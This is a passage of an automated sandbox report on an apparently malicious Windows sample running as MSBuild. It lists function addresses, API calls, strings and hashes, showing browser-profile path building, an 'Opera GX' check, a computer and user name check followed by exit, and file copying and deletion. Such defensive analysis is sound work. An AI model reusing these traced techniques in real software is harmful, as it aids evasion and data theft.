                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000104,00F79D48), ref: 004173F7
                                                                                                                                                                                                                                                • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041741E
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041743E
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00417452
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00F71248), ref: 00417465
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00417479
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00F79050), ref: 0041748D
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                • Part of subcall function 00417140: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041716E
                                                                                                                                                                                                                                                • Part of subcall function 00417140: HeapAlloc.KERNEL32(00000000), ref: 00417175
                                                                                                                                                                                                                                                • Part of subcall function 00417140: wsprintfA.USER32 ref: 0041718E
                                                                                                                                                                                                                                                • Part of subcall function 00417140: FindFirstFileA.KERNEL32(?,?), ref: 004171A5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 167551676-0
                                                                                                                                                                                                                                              • Opcode ID: c1c4ac1ed6e2d5e65371575c7c6f7eac02c140687c42abe241e93945ccb91e40
                                                                                                                                                                                                                                              • Instruction ID: 83ca6cd176221eaf65384a2e70bd6f3e35ae6f3ada24e69a7023b9efa6df4b42
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1c4ac1ed6e2d5e65371575c7c6f7eac02c140687c42abe241e93945ccb91e40
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8341E6B190021CABDB15EBA0CC86FDD7778AB0C704F40469EF71567191DBB8A788CBA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00407280 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 119libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(00F79B28,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,00420210,000000FF,?,0040BCD3,00F78E50), ref: 004072B1
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(00F79B28,00000000,00000000,?,0040BCD3,TjB,00426A54,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426A4F,?,?,?,00000000,00420210,000000FF), ref: 0040732E
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00F79590,?,?,?,00000000,00420210,000000FF,?,0040BCD3), ref: 00407346
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • TjB, xrefs: 004072DA, 00407312, 004072DD
                                                                                                                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004072A6, 004072C4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$TjB
                                                                                                                                                                                                                                              • API String ID: 2929475105-3266114336
                                                                                                                                                                                                                                              • Opcode ID: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                              • Instruction ID: ef5f06d785e981839736ef054ac1c91612f0bbff260fa06a83a8b7e256dd51d8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17416E70900615EFC720EFA4ED45EAA7BBAEB48B00F10553EF501A32E1DB786945CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 004153E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                              • String ID: PdA$PdA
                                                                                                                                                                                                                                              • API String ID: 4198075804-199869184
                                                                                                                                                                                                                                              • Opcode ID: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                              • Instruction ID: 58f52d09a55b75ac7dcb790bb2502d5d97770f71d094898c51def8a770c609ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB416F34800248EECB11DFE5C941BDDBBB5AF19308F50807EE906632D2DB782B48CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 004104D0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00F70990,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00F790D0,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00410530
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                              • Opcode ID: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                              • Instruction ID: 676a6382b8ff66aaa777a0d0020f05f931ed1f937911e77e191903498250bf3d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92F04FB9640218FFE710DBA0EC49FAB7B7EEB49B01F005159FB0597240D6705900CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0040A170 Relevance: 6.3, APIs: 4, Instructions: 282filestringCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00F70418,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A227
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A40B
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040A41F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040A4A1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                              • Opcode ID: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                              • Instruction ID: b59fb0c15770b26fa6eb1e59df2b1821273456b1948b1926dc15d3532991443d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4B18070801248EACB14EBE4D955BEDBB79AF29304F54417EE502732D2DB782B0DCBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0040E2F0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 485COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                • Part of subcall function 0040CDE0: StrStrA.SHLWAPI(00000000,00F78D18,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                • Part of subcall function 0040CDE0: memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                              • String ID: $$Opera GX
                                                                                                                                                                                                                                              • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                              • Opcode ID: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                              • Instruction ID: 80cc4b7ed22ef5f98a5cc857f1ea2cbded4609870464dcecd3af56b3405bc9c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68128070901248EACB14EBE5D945ADDBBB9AF19304F14817EE905732D2DB782B0CC7A6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00410260 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00F6E948,004184AF), ref: 0041026C
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00F6E948,004184AF), ref: 00410273
                                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                                                                                                                              • Opcode ID: 7bce67f87bdb96f85597cc7a337a5ba78b465bb225b0d0b4e914754af934b001
                                                                                                                                                                                                                                              • Instruction ID: 4b37c6b9c783d41ef7fb4556bea2f0c7907c2bd1f90e8b131d8aee123ed8a75f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bce67f87bdb96f85597cc7a337a5ba78b465bb225b0d0b4e914754af934b001
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E08CB5640228ABE3009BD8AC0EBDB7BADDB0AB51F000192BB05D3240E6F48D0047E4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00401050 Relevance: 4.5, APIs: 3, Instructions: 19stringCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00F6E948,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00F6E948,004184AF), ref: 00410273
                                                                                                                                                                                                                                                • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                              • strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00F6E978,?,00401074,00F6E978,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00F6E978,?,00401074,00F6E978,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00F6E978), ref: 00410247
                                                                                                                                                                                                                                              • strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2098570390-0
                                                                                                                                                                                                                                              • Opcode ID: c087e7d871184e6450b3b76f68df29489e174e0935f95b3891491568ebb2438e
                                                                                                                                                                                                                                              • Instruction ID: 26cb4187d2c4df1171f7cb5428b4e0e717764192679f396c01235be0c1ba569e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c087e7d871184e6450b3b76f68df29489e174e0935f95b3891491568ebb2438e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97D05BB2D0060156CF1077B25C59E5B316D5A24309B00143FFC40D3151E63DFCD4827D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00415560 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70stringCOMMON
